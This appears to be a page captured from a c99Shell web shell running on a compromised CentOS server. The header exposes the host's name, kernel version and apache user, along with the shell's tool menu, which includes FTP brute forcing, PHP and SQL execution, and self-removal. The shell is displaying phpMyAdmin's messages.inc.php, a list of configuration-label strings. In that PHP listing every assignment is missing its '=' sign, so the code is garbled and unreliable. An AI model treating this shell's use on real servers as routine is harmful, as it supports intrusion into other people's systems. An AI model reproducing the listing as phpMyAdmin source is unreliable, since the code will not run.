!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/config/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     messages.inc.php (39.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Messages for phpMyAdmin.
 *
 * This file is here for easy transition to Gettext. You should not add any
 * new messages here, use instead gettext directly in your template/PHP
 * file.
 *
 * @package phpMyAdmin
 */

if (!function_exists('__')) {
    die(
'Bad invocation!');
}

$strConfigAjaxEnable_desc __('Improves efficiency of screen refresh');
$strConfigAjaxEnable_name __('Enable Ajax');
$strConfigAllowArbitraryServer_desc __('If enabled user can enter any MySQL server in login form for cookie auth');
$strConfigAllowArbitraryServer_name __('Allow login to any MySQL server');
$strConfigAllowThirdPartyFraming_desc __('Enabling this allows a page located on a different domain to call phpMyAdmin inside a frame, and is a potential [strong]security hole[/strong] allowing cross-frame scripting attacks');
$strConfigAllowThirdPartyFraming_name __('Allow third party framing');
$strConfigAllowUserDropDatabase_name __('Show &quot;Drop database&quot; link to normal users');
$strConfigblowfish_secret_desc __('Secret passphrase used for encrypting cookies in [kbd]cookie[/kbd] authentication');
$strConfigblowfish_secret_name __('Blowfish secret');
$strConfigBrowseMarkerEnable_desc __('Highlight selected rows');
$strConfigBrowseMarkerEnable_name __('Row marker');
$strConfigBrowsePointerEnable_desc __('Highlight row pointed by the mouse cursor');
$strConfigBrowsePointerEnable_name __('Highlight pointer');
$strConfigBZipDump_desc __('Enable [a@http://en.wikipedia.org/wiki/Bzip2]bzip2[/a] compression for import and export operations');
$strConfigBZipDump_name __('Bzip2');
$strConfigCharEditing_desc __('Defines which type of editing controls should be used for CHAR and VARCHAR columns; [kbd]input[/kbd] - allows limiting of input length, [kbd]textarea[/kbd] - allows newlines in columns');
$strConfigCharEditing_name __('CHAR columns editing');
$strConfigCharTextareaCols_desc __('Number of columns for CHAR/VARCHAR textareas');
$strConfigCharTextareaCols_name __('CHAR textarea columns');
$strConfigCharTextareaRows_desc __('Number of rows for CHAR/VARCHAR textareas');
$strConfigCharTextareaRows_name __('CHAR textarea rows');
$strConfigCheckConfigurationPermissions_name __('Check config file permissions');
$strConfigCompressOnFly_desc __('Compress gzip/bzip2 exports on the fly without the need for much memory; if you encounter problems with created gzip/bzip2 files disable this feature');
$strConfigCompressOnFly_name __('Compress on the fly');
$strConfigConfigurationFile __('Configuration file');
$strConfigConfirm_desc __('Whether a warning (&quot;Are your really sure...&quot;) should be displayed when you\'re about to lose data');
$strConfigConfirm_name __('Confirm DROP queries');
$strConfigDBG_sql_name __('Debug SQL');
$strConfigDefaultDisplay_name __('Default display direction');
$strConfigDefaultPropDisplay_desc __('[kbd]horizontal[/kbd], [kbd]vertical[/kbd] or a number that indicates maximum number for which vertical model is used');
$strConfigDefaultPropDisplay_name __('Display direction for altering/creating columns');
$strConfigDefaultTabDatabase_desc __('Tab that is displayed when entering a database');
$strConfigDefaultTabDatabase_name __('Default database tab');
$strConfigDefaultTabServer_desc __('Tab that is displayed when entering a server');
$strConfigDefaultTabServer_name __('Default server tab');
$strConfigDefaultTabTable_desc __('Tab that is displayed when entering a table');
$strConfigDefaultTabTable_name __('Default table tab');
$strConfigDisplayBinaryAsHex_desc __('Show binary contents as HEX by default');
$strConfigDisplayBinaryAsHex_name __('Show binary contents as HEX');
$strConfigDisplayDatabasesList_desc __('Show database listing as a list instead of a drop down');
$strConfigDisplayDatabasesList_name __('Display databases as a list');
$strConfigDisplayServersList_desc __('Show server listing as a list instead of a drop down');
$strConfigDisplayServersList_name __('Display servers as a list');
$strConfigEditInWindow_desc __('Edit SQL queries in popup window');
$strConfigEditInWindow_name __('Edit in window');
$strConfigError_Handler_display_name __('Display errors');
$strConfigError_Handler_gather_name __('Gather errors');
$strConfigErrorIconic_desc __('Show icons for warning, error and information messages');
$strConfigErrorIconic_name __('Iconic errors');
$strConfigExecTimeLimit_desc __('Set the number of seconds a script is allowed to run ([kbd]0[/kbd] for no limit)');
$strConfigExecTimeLimit_name __('Maximum execution time');
$strConfigExport_asfile_name __('Save as file');
$strConfigExport_charset_name __('Character set of the file');
$strConfigExport_codegen_format_name __('Format');
$strConfigExport_compression_name __('Compression');
$strConfigExport_csv_columns_name __('Put columns names in the first row');
$strConfigExport_csv_enclosed_name __('Columns enclosed by');
$strConfigExport_csv_escaped_name __('Columns escaped by');
$strConfigExport_csv_null_name __('Replace NULL by');
$strConfigExport_csv_removeCRLF_name __('Remove CRLF characters within columns');
$strConfigExport_csv_separator_name __('Columns terminated by');
$strConfigExport_csv_terminated_name __('Lines terminated by');
$strConfigExport_excel_columns_name __('Put columns names in the first row');
$strConfigExport_excel_edition_name __('Excel edition');
$strConfigExport_excel_null_name __('Replace NULL by');
$strConfigExport_excel_removeCRLF_name __('Remove CRLF characters within columns');
$strConfigExport_file_template_database_name __('Database name template');
$strConfigExport_file_template_server_name __('Server name template');
$strConfigExport_file_template_table_name __('Table name template');
$strConfigExport_format_name __('Format');
$strConfigExport_htmlword_columns_name __('Put columns names in the first row');
$strConfigExport_htmlword_null_name __('Replace NULL by');
$strConfigExport_htmlword_structure_or_data_name __('Dump table');
$strConfigExport_latex_caption_name __('Include table caption');
$strConfigExport_latex_columns_name __('Put columns names in the first row');
$strConfigExport_latex_comments_name __('Comments');
$strConfigExport_latex_data_caption_name __('Table caption');
$strConfigExport_latex_data_continued_caption_name __('Continued table caption');
$strConfigExport_latex_data_label_name __('Label key');
$strConfigExport_latex_mime_name __('MIME type');
$strConfigExport_latex_null_name  __('Replace NULL by');
$strConfigExport_latex_relation_name __('Relations');
$strConfigExport_latex_structure_caption_name __('Table caption');
$strConfigExport_latex_structure_continued_caption_name __('Continued table caption');
$strConfigExport_latex_structure_label_name __('Label key');
$strConfigExport_latex_structure_or_data_name __('Dump table');
$strConfigExport_method_name __('Export method');
$strConfigExport_ods_columns_name __('Put columns names in the first row');
$strConfigExport_ods_null_name __('Replace NULL by');
$strConfigExport_odt_columns_name __('Put columns names in the first row');
$strConfigExport_odt_comments_name __('Comments');
$strConfigExport_odt_mime_name __('MIME type');
$strConfigExport_odt_null_name __('Replace NULL by');
$strConfigExport_odt_relation_name __('Relations');
$strConfigExport_odt_structure_or_data_name __('Dump table');
$strConfigExport_onserver_name __('Save on server');
$strConfigExport_onserver_overwrite_name __('Overwrite existing file(s)');
$strConfigExport_quick_export_onserver_name __('Save on server');
$strConfigExport_quick_export_onserver_overwrite_name __('Overwrite existing file(s)');
$strConfigExport_remember_file_template_name __('Remember file name template');
$strConfigExport_sql_auto_increment_name __('Add AUTO_INCREMENT value');
$strConfigExport_sql_backquotes_name __('Enclose table and column names with backquotes');
$strConfigExport_sql_compatibility_name __('SQL compatibility mode');
$strConfigExport_sql_create_table_statements_name __('Syntax to use when inserting data');
$strConfigExport_sql_dates_name __('Creation/Update/Check dates');
$strConfigExport_sql_delayed_name __('Use delayed inserts');
$strConfigExport_sql_disable_fk_name __('Disable foreign key checks');
$strConfigExport_sql_drop_database_name sprintf(__('Add %s'), 'DROP DATABASE');
$strConfigExport_sql_drop_table_name sprintf(__('Add %s'), 'DROP TABLE / VIEW / PROCEDURE / FUNCTION / EVENT');
$strConfigExport_sql_hex_for_blob_name __('Use hexadecimal for BLOB');
$strConfigExport_sql_if_not_exists_name sprintf(__('Add %s'), 'IF NOT EXISTS');
$strConfigExport_sql_ignore_name __('Use ignore inserts');
$strConfigExport_sql_include_comments_name __('Comments');
$strConfigExport_sql_max_query_size_name __('Maximal length of created query');
$strConfigExport_sql_mime_name __('MIME type');
$strConfigExport_sql_procedure_function_name sprintf(__('Add %s'), 'CREATE PROCEDURE / FUNCTION / EVENT');
$strConfigExport_sql_relation_name __('Relations');
$strConfigExport_sql_structure_or_data_name __('Dump table');
$strConfigExport_sql_type_name __('Export type');
$strConfigExport_sql_use_transaction_name __('Enclose export in a transaction');
$strConfigExport_sql_utc_time_name __('Export time in UTC');
$strConfigExport_texytext_columns_name __('Put columns names in the first row');
$strConfigExport_texytext_null_name __('Replace NULL by');
$strConfigExport_texytext_structure_or_data_name __('Dump table');
$strConfigExport_xls_columns_name __('Put columns names in the first row');
$strConfigExport_xls_null_name __('Replace NULL by');
$strConfigExport_xlsx_columns_name __('Put columns names in the first row');
$strConfigExport_xlsx_null_name __('Replace NULL by');
$strConfigForceSSL_desc __('Force secured connection while using phpMyAdmin');
$strConfigForceSSL_name __('Force SSL connection');
$strConfigForeignKeyDropdownOrder_desc __('Sort order for items in a foreign-key dropdown box; [kbd]content[/kbd] is the referenced data, [kbd]id[/kbd] is the key value');
$strConfigForeignKeyDropdownOrder_name __('Foreign key dropdown order');
$strConfigForeignKeyMaxLimit_desc __('A dropdown will be used if fewer items are present');
$strConfigForeignKeyMaxLimit_name __('Foreign key limit');
$strConfigForm_Browse __('Browse mode');
$strConfigForm_Browse_desc __('Customize browse mode');
$strConfigForm_CodeGen 'CodeGen';
$strConfigForm_CodeGen_desc __('Customize default options');
$strConfigForm_Csv __('CSV');
$strConfigForm_Csv_desc __('Customize default options');
$strConfigForm_Developer __('Developer');
$strConfigForm_Developer_desc __('Settings for phpMyAdmin developers');
$strConfigForm_Edit __('Edit mode');
$strConfigForm_Edit_desc __('Customize edit mode');
$strConfigForm_Export __('Export');
$strConfigForm_Export_defaults __('Export defaults');
$strConfigForm_Export_defaults_desc __('Customize default export options');
$strConfigForm_Features __('Features');
$strConfigForm_General __('General');
$strConfigForm_General_desc __('Set some commonly used options');
$strConfigForm_Import __('Import');
$strConfigForm_Import_defaults __('Import defaults');
$strConfigForm_Import_defaults_desc __('Customize default common import options');
$strConfigForm_Import_export __('Import / export');
$strConfigForm_Import_export_desc __('Set import and export directories and compression options');
$strConfigForm_Latex __('LaTeX');
$strConfigForm_Latex_desc __('Customize default options');
$strConfigForm_Left_databases __('Databases');
$strConfigForm_Left_databases_desc __('Databases display options');
$strConfigForm_Left_frame __('Navigation frame');
$strConfigForm_Left_frame_desc __('Customize appearance of the navigation frame');
$strConfigForm_Left_servers __('Servers');
$strConfigForm_Left_servers_desc __('Servers display options');
$strConfigForm_Left_tables __('Tables');
$strConfigForm_Left_tables_desc __('Tables display options');
$strConfigForm_Main_frame __('Main frame');
$strConfigForm_Microsoft_Office __('Microsoft Office');
$strConfigForm_Microsoft_Office_desc __('Customize default options');
$strConfigForm_Open_Document __('Open Document');
$strConfigForm_Open_Document_desc __('Customize default options');
$strConfigForm_Other_core_settings __('Other core settings');
$strConfigForm_Other_core_settings_desc __('Settings that didn\'t fit enywhere else');
$strConfigForm_Page_titles __('Page titles');
$strConfigForm_Page_titles_desc __('Specify browser\'s title bar text. Refer to [a@Documentation.html#cfg_TitleTable]documentation[/a] for magic strings that can be used to get special values.');
$strConfigForm_Query_window __('Query window');
$strConfigForm_Query_window_desc __('Customize query window options');
$strConfigForm_Security __('Security');
$strConfigForm_Security_desc __('Please note that phpMyAdmin is just a user interface and its features do not limit MySQL');
$strConfigForm_Server __('Basic settings');
$strConfigForm_Server_auth __('Authentication');
$strConfigForm_Server_auth_desc __('Authentication settings');
$strConfigForm_Server_config __('Server configuration');
$strConfigForm_Server_config_desc __('Advanced server configuration, do not change these options unless you know what they are for');
$strConfigForm_Server_desc __('Enter server connection parameters');
$strConfigForm_Server_pmadb __('Configuration storage');
$strConfigForm_Server_pmadb_desc __('Configure phpMyAdmin configuration storage to gain access to additional features, see [a@Documentation.html#linked-tables]phpMyAdmin configuration storage[/a] in documentation');
$strConfigForm_Server_tracking __('Changes tracking');
$strConfigForm_Server_tracking_desc __('Tracking of changes made in database. Requires the phpMyAdmin configuration storage.');
$strConfigFormset_Export __('Customize export options');
$strConfigFormset_Features __('Features');
$strConfigFormset_Import __('Customize import defaults');
$strConfigFormset_Left_frame __('Customize navigation frame');
$strConfigFormset_Main_frame __('Customize main frame');
$strConfigFormset_Sql_queries __('SQL queries');
$strConfigForm_Sql __('SQL');
$strConfigForm_Sql_box __('SQL Query box');
$strConfigForm_Sql_box_desc __('Customize links shown in SQL Query boxes');
$strConfigForm_Sql_desc __('Customize default options');
$strConfigForm_Sql_queries __('SQL queries');
$strConfigForm_Sql_queries_desc __('SQL queries settings');
$strConfigForm_Sql_validator __('SQL Validator');
$strConfigForm_Sql_validator_desc __('If you wish to use the SQL Validator service, you should be aware that [strong]all SQL statements are stored anonymously for statistical purposes[/strong].[br][em][a@http://sqlvalidator.mimer.com/]Mimer SQL Validator[/a], Copyright 2002 Upright Database Technology. All rights reserved.[/em]');
$strConfigForm_Startup __('Startup');
$strConfigForm_Startup_desc __('Customize startup page');
$strConfigForm_Tabs __('Tabs');
$strConfigForm_Tabs_desc __('Choose how you want tabs to work');
$strConfigForm_Text_fields __('Text fields');
$strConfigForm_Text_fields_desc __('Customize text input fields');
$strConfigForm_Texy __('Texy! text');
$strConfigForm_Texy_desc __('Customize default options');
$strConfigForm_Warnings __('Warnings');
$strConfigForm_Warnings_desc __('Disable some of the warnings shown by phpMyAdmin');
$strConfigGZipDump_desc __('Enable [a@http://en.wikipedia.org/wiki/Gzip]gzip[/a] compression for import and export operations');
$strConfigGZipDump_name __('GZip');
$strConfigIconvExtraParams_name __('Extra parameters for iconv');
$strConfigIgnoreMultiSubmitErrors_desc __('If enabled, phpMyAdmin continues computing multiple-statement queries even if one of the queries failed');
$strConfigIgnoreMultiSubmitErrors_name __('Ignore multiple statement errors');
$strConfigImport_allow_interrupt_desc __('Allow interrupt of import in case script detects it is close to time limit. This might be good way to import large files, however it can break transactions.');
$strConfigImport_allow_interrupt_name __('Partial import: allow interrupt');
$strConfigImport_charset_name __('Character set of the file');
$strConfigImport_csv_col_names_name __('Lines terminated by');
$strConfigImport_csv_enclosed_name __('Columns enclosed by');
$strConfigImport_csv_escaped_name __('Columns escaped by');
$strConfigImport_csv_ignore_name __('Do not abort on INSERT error');
$strConfigImport_csv_replace_name __('Replace table data with file');
$strConfigImport_csv_terminated_name __('Columns terminated by');
$strConfigImport_format_desc __('Default format; be aware that this list depends on location (database, table) and only SQL is always available');
$strConfigImport_format_name __('Format of imported file');
$strConfigImport_ldi_enclosed_name __('Columns enclosed by');
$strConfigImport_ldi_escaped_name __('Columns escaped by');
$strConfigImport_ldi_ignore_name __('Do not abort on INSERT error');
$strConfigImport_ldi_local_option_name __('Use LOCAL keyword');
$strConfigImport_ldi_replace_name __('Replace table data with file');
$strConfigImport_ldi_terminated_name __('Columns terminated by');
$strConfigImport_ods_col_names_name __('Column names in first row');
$strConfigImport_ods_empty_rows_name __('Do not import empty rows');
$strConfigImport_ods_recognize_currency_name __('Import currencies ($5.00 to 5.00)');
$strConfigImport_ods_recognize_percentages_name __('Import percentages as proper decimals (12.00% to .12)');
$strConfigImport_skip_queries_desc __('Number of queries to skip from start');
$strConfigImport_skip_queries_name __('Partial import: skip queries');
$strConfigImport_sql_compatibility_name __('SQL compatibility mode');
$strConfigImport_sql_no_auto_value_on_zero_name __('Do not use AUTO_INCREMENT for zero values');
$strConfigImport_xls_col_names_name __('Column names in first row');
$strConfigImport_xlsx_col_names_name __('Column names in first row');
$strConfigInitialSlidersState_name __('Initial state for sliders');
$strConfigInsertRows_desc __('How many rows can be inserted at one time');
$strConfigInsertRows_name __('Number of inserted rows');
$strConfigLeftDefaultTabTable_name __('Target for quick access icon');
$strConfigLeftDisplayLogo_desc __('Show logo in left frame');
$strConfigLeftDisplayLogo_name __('Display logo');
$strConfigLeftDisplayServers_desc __('Display server choice at the top of the left frame');
$strConfigLeftDisplayServers_name __('Display servers selection');
$strConfigLeftDisplayTableFilterMinimum_name __('Minimum number of tables to display the table filter box');
$strConfigLeftFrameDBSeparator_desc __('String that separates databases into different tree levels');
$strConfigLeftFrameDBSeparator_name __('Database tree separator');
$strConfigLeftFrameDBTree_desc __('Only light version; display databases in a tree (determined by the separator defined below)');
$strConfigLeftFrameDBTree_name __('Display databases in a tree');
$strConfigLeftFrameLight_desc __('Disable this if you want to see all databases at once');
$strConfigLeftFrameLight_name __('Use light version');
$strConfigLeftFrameTableLevel_name __('Maximum table tree depth');
$strConfigLeftFrameTableSeparator_desc __('String that separates tables into different tree levels');
$strConfigLeftFrameTableSeparator_name __('Table tree separator');
$strConfigLeftLogoLink_desc __('URL where logo in the navigation frame will point to');
$strConfigLeftLogoLink_name __('Logo link URL');
$strConfigLeftLogoLinkWindow_desc __('Open the linked page in the main window ([kbd]main[/kbd]) or in a new one ([kbd]new[/kbd])');
$strConfigLeftLogoLinkWindow_name __('Logo link target');
$strConfigLeftPointerEnable_desc __('Highlight server under the mouse cursor');
$strConfigLeftPointerEnable_name __('Enable highlighting');
$strConfigLightTabs_desc __('Use less graphically intense tabs');
$strConfigLightTabs_name __('Light tabs');
$strConfigLimitChars_desc __('Maximum number of characters shown in any non-numeric column on browse view');
$strConfigLimitChars_name __('Limit column characters');
$strConfigLoginCookieDeleteAll_desc __('If TRUE, logout deletes cookies for all servers; when set to FALSE, logout only occurs for the current server. Setting this to FALSE makes it easy to forget to log out from other servers when connected to multiple servers.');
$strConfigLoginCookieDeleteAll_name __('Delete all cookies on logout');
$strConfigLoginCookieRecall_desc __('Define whether the previous login should be recalled or not in cookie authentication mode');
$strConfigLoginCookieRecall_name __('Recall user name');
$strConfigLoginCookieStore_desc __('Defines how long (in seconds) a login cookie should be stored in browser. The default of 0 means that it will be kept for the existing session only, and will be deleted as soon as you close the browser window. This is recommended for non-trusted environments.');
$strConfigLoginCookieStore_name __('Login cookie store');
$strConfigLoginCookieValidity_desc __('Define how long (in seconds) a login cookie is valid');
$strConfigLoginCookieValidity_name __('Login cookie validity');
$strConfigLongtextDoubleTextarea_desc __('Double size of textarea for LONGTEXT columns');
$strConfigLongtextDoubleTextarea_name __('Bigger textarea for LONGTEXT');
$strConfigMainPageIconic_name __('Use icons on main page');
$strConfigMaxCharactersInDisplayedSQL_desc __('Maximum number of characters used when a SQL query is displayed');
$strConfigMaxCharactersInDisplayedSQL_name __('Maximum displayed SQL length');
$strConfigMaxDbList_cmt __('Users cannot set a higher value');
$strConfigMaxDbList_desc __('Maximum number of databases displayed in left frame and database list');
$strConfigMaxDbList_name __('Maximum databases');
$strConfigMaxRows_desc __('Number of rows displayed when browsing a result set. If the result set contains more rows, &quot;Previous&quot; and &quot;Next&quot; links will be shown.');
$strConfigMaxRows_name __('Maximum number of rows to display');
$strConfigMaxTableList_cmt __('Users cannot set a higher value');
$strConfigMaxTableList_desc __('Maximum number of tables displayed in table list');
$strConfigMaxTableList_name __('Maximum tables');
$strConfigMcryptDisableWarning_desc __('Disable the default warning that is displayed if mcrypt is missing for cookie authentication');
$strConfigMcryptDisableWarning_name __('mcrypt warning');
$strConfigMemoryLimit_desc __('The number of bytes a script is allowed to allocate, eg. [kbd]32M[/kbd] ([kbd]0[/kbd] for no limit)');
$strConfigMemoryLimit_name __('Memory limit');
$strConfigModifyDeleteAtLeft_desc __('These are Edit, Inline edit, Copy and Delete links');
$strConfigModifyDeleteAtLeft_name __('Show table row links on left side');
$strConfigModifyDeleteAtRight_name __('Show table row links on right side');
$strConfigNaturalOrder_desc __('Use natural order for sorting table and database names');
$strConfigNaturalOrder_name __('Natural order');
$strConfigNavigationBarIconic_desc __('Use only icons, only text or both');
$strConfigNavigationBarIconic_name __('Iconic navigation bar');
$strConfigOBGzip_desc __('use GZip output buffering for increased speed in HTTP transfers');
$strConfigOBGzip_name __('GZip output buffering');
$strConfigOrder_desc __('[kbd]SMART[/kbd] - i.e. descending order for columns of type TIME, DATE, DATETIME and TIMESTAMP, ascending order otherwise');
$strConfigOrder_name __('Default sorting order');
$strConfigPersistentConnections_desc __('Use persistent connections to MySQL databases');
$strConfigPersistentConnections_name __('Persistent connections');
$strConfigPmaNoRelation_DisableWarning_desc __('Disable the default warning that is displayed on the database details Structure page if any of the required tables for the phpMyAdmin configuration storage could not be found');
$strConfigPmaNoRelation_DisableWarning_name __('Missing phpMyAdmin configuration storage tables');
$strConfigPropertiesIconic_desc __('Use only icons, only text or both');
$strConfigPropertiesIconic_name __('Iconic table operations');
$strConfigProtectBinary_desc __('Disallow BLOB and BINARY columns from editing');
$strConfigProtectBinary_name __('Protect binary columns');
$strConfigQueryHistoryDB_desc __('Enable if you want DB-based query history (requires phpMyAdmin configuration storage). If disabled, this utilizes JS-routines to display query history (lost by window close).');
$strConfigQueryHistoryDB_name __('Permanent query history');
$strConfigQueryHistoryMax_cmt __('Users cannot set a higher value');
$strConfigQueryHistoryMax_desc __('How many queries are kept in history');
$strConfigQueryHistoryMax_name __('Query history length');
$strConfigQueryWindowDefTab_desc __('Tab displayed when opening a new query window');
$strConfigQueryWindowDefTab_name __('Default query window tab');
$strConfigQueryWindowHeight_desc __('Query window height (in pixels)');
$strConfigQueryWindowHeight_name __('Query window height');
$strConfigQueryWindowWidth_desc __('Query window width (in pixels)');
$strConfigQueryWindowWidth_name __('Query window width');
$strConfigRecodingEngine_desc __('Select which functions will be used for character set conversion');
$strConfigRecodingEngine_name __('Recoding engine');
$strConfigRepeatCells_desc __('Repeat the headers every X cells, [kbd]0[/kbd] deactivates this feature');
$strConfigRepeatCells_name __('Repeat headers');
$strConfigReplaceHelpImg_desc __('Show help button instead of Documentation text');
$strConfigReplaceHelpImg_name __('Show help button');
$strConfigRestoreDefaultValue __('Restore default value');
$strConfigSaveDir_desc __('Directory where exports can be saved on server');
$strConfigSaveDir_name __('Save directory');
$strConfigServers_AllowDeny_order_desc __('Leave blank if not used');
$strConfigServers_AllowDeny_order_name __('Host authorization order');
$strConfigServers_AllowDeny_rules_desc __('Leave blank for defaults');
$strConfigServers_AllowDeny_rules_name __('Host authorization rules');
$strConfigServers_AllowNoPassword_name __('Allow logins without a password');
$strConfigServers_AllowRoot_name __('Allow root login');
$strConfigServers_auth_http_realm_desc __('HTTP Basic Auth Realm name to display when doing HTTP Auth');
$strConfigServers_auth_http_realm_name __('HTTP Realm');
$strConfigServers_auth_swekey_config_desc __('The path for the config file for [a@http://swekey.com]SweKey hardware authentication[/a] (not located in your document root; suggested: /etc/swekey.conf)');
$strConfigServers_auth_swekey_config_name __('SweKey config file');
$strConfigServers_auth_type_desc __('Authentication method to use');
$strConfigServers_auth_type_name __('Authentication type');
$strConfigServers_bookmarktable_desc __('Leave blank for no [a@http://wiki.phpmyadmin.net/pma/bookmark]bookmark[/a] support, suggested: [kbd]pma_bookmark[/kbd]');
$strConfigServers_bookmarktable_name __('Bookmark table');
$strConfigServers_column_info_desc __('Leave blank for no column comments/mime types, suggested: [kbd]pma_column_info[/kbd]');
$strConfigServers_column_info_name __('Column information table');
$strConfigServers_compress_desc __('Compress connection to MySQL server');
$strConfigServers_compress_name __('Compress connection');
$strConfigServers_connect_type_desc __('How to connect to server, keep [kbd]tcp[/kbd] if unsure');
$strConfigServers_connect_type_name __('Connection type');
$strConfigServers_controlpass_name __('Control user password');
$strConfigServers_controluser_desc __('A special MySQL user configured with limited permissions, more information available on [a@http://wiki.phpmyadmin.net/pma/controluser]wiki[/a]');
$strConfigServers_controluser_name __('Control user');
$strConfigServers_CountTables_desc __('Count tables when showing database list');
$strConfigServers_CountTables_name __('Count tables');
$strConfigServers_designer_coords_desc __('Leave blank for no Designer support, suggested: [kbd]pma_designer_coords[/kbd]');
$strConfigServers_designer_coords_name __('Designer table');
$strConfigServers_DisableIS_desc __('More information on [a@http://sf.net/support/tracker.php?aid=1849494]PMA bug tracker[/a] and [a@http://bugs.mysql.com/19588]MySQL Bugs[/a]');
$strConfigServers_DisableIS_name __('Disable use of INFORMATION_SCHEMA');
$strConfigServers_extension_desc __('What PHP extension to use; you should use mysqli if supported');
$strConfigServers_extension_name __('PHP extension to use');
$strConfigServers_hide_db_desc __('Hide databases matching regular expression (PCRE)');
$strConfigServers_hide_db_name __('Hide databases');
$strConfigServers_history_desc __('Leave blank for no SQL query history support, suggested: [kbd]pma_history[/kbd]');
$strConfigServers_history_name __('SQL query history table');
$strConfigServers_host_desc __('Hostname where MySQL server is running');
$strConfigServers_host_name __('Server hostname');
$strConfigServers_LogoutURL_name __('Logout URL');
$strConfigServers_nopassword_desc __('Try to connect without password');
$strConfigServers_nopassword_name __('Connect without password');
$strConfigServers_only_db_desc __('You can use MySQL wildcard characters (% and _), escape them if you want to use their literal instances, i.e. use [kbd]\'my\_db\'[/kbd] and not [kbd]\'my_db\'[/kbd]. Using this option you can sort database list, just enter their names in order and use [kbd]*[/kbd] at the end to show the rest in alphabetical order.');
$strConfigServers_only_db_name __('Show only listed databases');
$strConfigServers_password_desc __('Leave empty if not using config auth');
$strConfigServers_password_name __('Password for config auth');
$strConfigServers_pdf_pages_desc __('Leave blank for no PDF schema support, suggested: [kbd]pma_pdf_pages[/kbd]');
$strConfigServers_pdf_pages_name __('PDF schema: pages table');
$strConfigServers_pmadb_desc __('Database used for relations, bookmarks, and PDF features. See [a@http://wiki.phpmyadmin.net/pma/pmadb]pmadb[/a] for complete information. Leave blank for no support. Suggested: [kbd]phpmyadmin[/kbd]');
$strConfigServers_pmadb_name __('Database name');
$strConfigServers_port_desc __('Port on which MySQL server is listening, leave empty for default');
$strConfigServers_port_name __('Server port');
$strConfigServers_relation_desc __('Leave blank for no [a@http://wiki.phpmyadmin.net/pma/relation]relation-links[/a] support, suggested: [kbd]pma_relation[/kbd]');
$strConfigServers_relation_name __('Relation table');
$strConfigServers_ShowDatabasesCommand_desc __('SQL command to fetch available databases');
$strConfigServers_ShowDatabasesCommand_name __('SHOW DATABASES command');
$strConfigServers_SignonSession_desc __('See [a@http://wiki.phpmyadmin.net/pma/auth_types#signon]authentication types[/a] for an example');
$strConfigServers_SignonSession_name __('Signon session name');
$strConfigServers_SignonURL_name __('Signon URL');
$strConfigServers_socket_desc __('Socket on which MySQL server is listening, leave empty for default');
$strConfigServers_socket_name __('Server socket');
$strConfigServers_ssl_desc __('Enable SSL for connection to MySQL server');
$strConfigServers_ssl_name __('Use SSL');
$strConfigServers_table_coords_desc __('Leave blank for no PDF schema support, suggested: [kbd]pma_table_coords[/kbd]');
$strConfigServers_table_coords_name __('PDF schema: table coordinates');
$strConfigServers_table_info_desc __('Table to describe the display columns, leave blank for no support; suggested: [kbd]pma_table_info[/kbd]');
$strConfigServers_table_info_name __('Display columns table');
$strConfigServers_tracking_add_drop_database_desc __('Whether a DROP DATABASE IF EXISTS statement will be added as first line to the log when creating a database.');
$strConfigServers_tracking_add_drop_database_name __('Add DROP DATABASE');
$strConfigServers_tracking_add_drop_table_desc __('Whether a DROP TABLE IF EXISTS statement will be added as first line to the log when creating a table.');
$strConfigServers_tracking_add_drop_table_name __('Add DROP TABLE');
$strConfigServers_tracking_add_drop_view_desc __('Whether a DROP VIEW IF EXISTS statement will be added as first line to the log when creating a view.');
$strConfigServers_tracking_add_drop_view_name __('Add DROP VIEW');
$strConfigServers_tracking_default_statements_desc __('Defines the list of statements the auto-creation uses for new versions.');
$strConfigServers_tracking_default_statements_name __('Statements to track');
$strConfigServers_tracking_desc __('Leave blank for no SQL query tracking support, suggested: [kbd]pma_tracking[/kbd]');
$strConfigServers_tracking_name __('SQL query tracking table');
$strConfigServers_tracking_version_auto_create_desc __('Whether the tracking mechanism creates versions for tables and views automatically.');
$strConfigServers_tracking_version_auto_create_name __('Automatically create versions');
$strConfigServers_userconfig_desc __('Leave blank for no user preferences storage in database, suggested: [kbd]pma_config[/kbd]');
$strConfigServers_userconfig_name __('User preferences storage table');
$strConfigServers_user_desc __('Leave empty if not using config auth');
$strConfigServers_user_name __('User for config auth');
$strConfigServers_verbose_check_desc __('Disable if you know that your pma_* tables are up to date. This prevents compatibility checks and thereby increases performance');
$strConfigServers_verbose_check_name __('Verbose check');
$strConfigServers_verbose_desc __('A user-friendly description of this server. Leave blank to display the hostname instead.');
$strConfigServers_verbose_name __('Verbose name of this server');
$strConfigShowAll_desc __('Whether a user should be displayed a &quot;show all (rows)&quot; button');
$strConfigShowAll_name __('Allow to display all the rows');
$strConfigShowChgPassword_desc __('Please note that enabling this has no effect with [kbd]config[/kbd] authentication mode because the password is hard coded in the configuration file; this does not limit the ability to execute the same command directly');
$strConfigShowChgPassword_name __('Show password change form');
$strConfigShowCreateDb_name __('Show create database form');
$strConfigShowFieldTypesInDataEditView_desc __('Defines whether or not type fields should be initially displayed in edit/insert mode');
$strConfigShowFieldTypesInDataEditView_name __('Show field types');
$strConfigShowFunctionFields_desc __('Display the function fields in edit/insert mode');
$strConfigShowFunctionFields_name __('Show function fields');
$strConfigShowPhpInfo_desc __('Shows link to [a@http://php.net/manual/function.phpinfo.php]phpinfo()[/a] output');
$strConfigShowPhpInfo_name __('Show phpinfo() link');
$strConfigShowServerInfo_name __('Show detailed MySQL server information');
$strConfigShowSQL_desc __('Defines whether SQL queries generated by phpMyAdmin should be displayed');
$strConfigShowSQL_name __('Show SQL queries');
$strConfigShowStats_desc __('Allow to display database and table statistics (eg. space usage)');
$strConfigShowStats_name __('Show statistics');
$strConfigShowTooltipAliasDB_desc __('If tooltips are enabled and a database comment is set, this will flip the comment and the real name');
$strConfigShowTooltipAliasDB_name __('Display database comment instead of its name');
